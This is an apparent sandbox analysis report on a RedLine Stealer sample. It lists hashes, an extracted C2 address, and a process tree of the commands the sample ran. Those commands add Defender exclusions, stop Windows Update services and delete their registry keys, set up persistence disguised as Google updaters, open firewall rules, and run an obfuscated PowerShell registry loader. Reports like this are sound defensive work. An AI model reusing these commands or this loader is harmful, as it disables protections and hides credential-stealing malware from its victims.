Analysis
-
max time kernel
261s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64 arch:x86 image:win10-20220812-en locale:en-us os:windows10-1703-x64 system -
submitted
01/11/2022, 09:09
Static task
static1
Behavioral task
behavioral1
Sample
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
Resource
win10-20220812-en
General
-
Target
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
-
Size
2.4MB
-
MD5
c1fe936433eb4be74eef3e7095f42d77
-
SHA1
b997230735a2a033647425441f908cb906047523
-
SHA256
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14
-
SHA512
e33c1fec65c97cd2c5dabeb460ef83e2102201d9d9cf1c2789b7dfa65e2bb6063b927612a7bfc7eff234fc70ee14802af4fe134b8abeb00c4f6fea2adda8e7a6
-
SSDEEP
24576:cBqYYgYPXQh8RMpJRh9dM46/uN9X5koyLSAOtSL2SxgCl3RuQ55313V:cBmsIoyLSAOtSll3T
Malware Config
Extracted
redline
@mnogokupurbolshoykarman
77.73.134.24:80
-
auth_value
b555cfd27c33c447be45d0969d5f35d8
Signatures
-
Modifies security service 2 TTPs 5 IoCs
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
- behavioral2/memory/4476-131-0x0000000000422212-mapping.dmp: family_redline
- behavioral2/memory/4476-126-0x0000000000400000-0x0000000000428000-memory.dmp: family_redline
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
- PID 4856 (powershell.EXE) created 584 (target 3)
- PID 2660 (svchost.exe) created 2240 (target 20)
- PID 2660 (svchost.exe) created 3636 (target 23)
- PID 2896 (powershell.EXE) created 584 (target 3)
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
- 3616 brave.exe
- 4860 chrome.exe
- 4464 ofg.exe
- 5088 conhost.exe
- 96 GoogleUpdate.exe
- 4836 updater.exe
- 2752 svcupdater.exe
- 3816 svcupdater.exe
- 5668 svcupdater.exe
- 7756 svcupdater.exe
-
Modifies Windows Firewall 1 TTPs 3 IoCs
- 492 netsh.exe
- 1620 netsh.exe
- 648 netsh.exe
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
- behavioral2/files/0x000800000001ac31-717.dat: upx
- behavioral2/files/0x000800000001ac31-728.dat: upx
- behavioral2/memory/4860-758-0x0000000000B90000-0x000000000142E000-memory.dmp: upx
- behavioral2/memory/4860-972-0x0000000000B90000-0x000000000142E000-memory.dmp: upx
-
VMProtect packed file 2 IoCs
- behavioral2/memory/96-1090-0x0000000003750000-0x000000000400F000-memory.dmp: vmprotect
- behavioral2/memory/96-1448-0x0000000003750000-0x000000000400F000-memory.dmp: vmprotect
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 7 IoCs
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml (OfficeClickToRun.exe)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
-
Suspicious use of SetThreadContext 7 IoCs
- PID 3668 (409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe) set thread context of 4476 (target 67)
- PID 4860 (chrome.exe) set thread context of 96 (target 84)
- PID 3616 (brave.exe) set thread context of 4288 (target 117)
- PID 4856 (powershell.EXE) set thread context of 4404 (target 124)
- PID 2896 (powershell.EXE) set thread context of 5052 (target 130)
- PID 4836 (updater.exe) set thread context of 864 (target 156)
- PID 4836 (updater.exe) set thread context of 2404 (target 157)
-
Drops file in Program Files directory 4 IoCs
- File created: C:\Program Files\Google\Chrome\updater.exe (brave.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (updater.exe)
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
-
Drops file in Windows directory 5 IoCs
- File opened for modification: C:\Windows\Tasks\dialersvc64.job (dialer.exe)
- File created: C:\Windows\GoogleUpdate.exe (chrome.exe)
- File created: C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File opened for modification: C:\Windows\Tasks\dialersvc32.job (dialer.exe)
- File created: C:\Windows\Tasks\dialersvc64.job (dialer.exe)
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
- 4664 sc.exe
- 4904 sc.exe
- 1144 sc.exe
- 4960 sc.exe
- 1124 sc.exe
- 4580 sc.exe
- 4832 sc.exe
- 4832 sc.exe
- 2148 sc.exe
- 3152 sc.exe
-
Program crash 2 IoCs
- PID 3328 WerFault.exe, crashed PID 2240 (target 20)
- PID 4896 WerFault.exe, crashed PID 3636 (target 23)
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 4652 schtasks.exe
- 4508 SCHTASKS.exe
- 2808 schtasks.exe
- 300 SCHTASKS.exe
-
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
- 3048 Explorer.EXE
-
Suspicious behavior: LoadsDriver 1 IoCs
- 628 Process not Found
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 2 IoCs
- 988 dwm.exe
- 988 dwm.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:636
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:988
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a50cddda-4fa9-420e-8041-c56dd5cee3a7}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{320035ed-0e86-4d9d-bd7a-63aad3124fb0}2⤵PID:5052
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:3188
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4996
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:3592
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2240
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2240 -s 7842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:4904
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:3152
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:288
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:4796
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:2664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:2232
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:2488
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵PID:3328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5100 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵PID:3020
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:300
-
-
C:\Windows\GoogleUpdate.exeC:\Windows\GoogleUpdate.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:96 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:492
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:1620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of WriteProcessMemory
PID:4672
-
-
-
        [level 5] C:\Windows\SysWOW64\netsh.exe
          cmdline: netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
          - Modifies Windows Firewall
          PID: 648

    [level 3] C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
      cmdline: "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4464
      [level 4] C:\Windows\SYSTEM32\cmd.exe
        cmdline: "cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        PID: 4672
        [level 5] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
          - Creates scheduled task(s)
          PID: 4652

    [level 3] C:\Users\Admin\AppData\Local\Temp\conhost.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 5088
      [level 4] C:\Windows\SYSTEM32\cmd.exe
        cmdline: "cmd.exe" /C schtasks /create /tn \yr2l5dk31e /tr "C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        - Suspicious use of WriteProcessMemory
        PID: 4944
        [level 5] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /tn \yr2l5dk31e /tr "C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
          - Creates scheduled task(s)
          PID: 2808

[level 1] C:\Windows\system32\DllHost.exe
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID: 3636
  [level 2] C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -u -p 3636 -s 904
    - Program crash
    PID: 4896

[level 1] C:\Windows\System32\RuntimeBroker.exe
  cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 3488

[level 1] C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  PID: 3048

[level 1] c:\windows\system32\taskhostw.exe
  cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  PID: 2736

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
  PID: 2636

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
  PID: 2628

[level 1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID: 2608

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
  PID: 2576

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Browser
  PID: 2568

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
  PID: 2492

[level 1] c:\windows\system32\sihost.exe
  cmdline: sihost.exe
  PID: 2468

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
  PID: 2396

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
  PID: 2364

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
  PID: 2356

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
  PID: 2156

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
  PID: 2052

[level 1] C:\Windows\System32\spoolsv.exe
  cmdline: C:\Windows\System32\spoolsv.exe
  PID: 2012

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k appmodel -s StateRepository
  PID: 1880

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
  PID: 1872

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservice -s netprofm
  PID: 1832

[level 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  PID: 1768

[level 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
  PID: 1760

[level 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  PID: 1632

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s Dnscache
  PID: 1580

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
  PID: 1556

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservice -s FontCache
  PID: 1504

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
  PID: 1488

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
  PID: 1412

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s SENS
  PID: 1400

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
  PID: 1348

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservice -s nsi
  PID: 1304

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Themes
  PID: 1212

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservice -s EventSystem
  PID: 1204

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
  PID: 1160

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
  PID: 1100

[level 1] c:\windows\system32\svchost.exe
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  PID: 848
  [level 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 2896
    [level 3] C:\Windows\System32\Conhost.exe
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 4384
  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 4856
    [level 3] C:\Windows\System32\Conhost.exe
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 3908
  [level 2] C:\Program Files\Google\Chrome\updater.exe
    cmdline: "C:\Program Files\Google\Chrome\updater.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID: 4836
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      PID: 4232
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      PID: 3808
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      PID: 4924
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      PID: 4844
    [level 3] C:\Windows\system32\cmd.exe
      cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
      PID: 1120
    [level 3] C:\Windows\system32\dialer.exe
      cmdline: C:\Windows\system32\dialer.exe xtrjicqmdliu
      PID: 864
    [level 3] C:\Windows\system32\dialer.exe
      cmdline: C:\Windows\system32\dialer.exe wvhbfinhdckusjju
      PID: 2404
  [level 2] C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
    cmdline: C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
    - Executes dropped EXE
    PID: 2752
  [level 2] C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    cmdline: C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    - Executes dropped EXE
    PID: 3816
  [level 2] C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    cmdline: C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
    - Executes dropped EXE
    PID: 5668
  [level 2] C:\Users\Admin\AppData\Roaming\yr2l5dk31e\svcupdater.exe
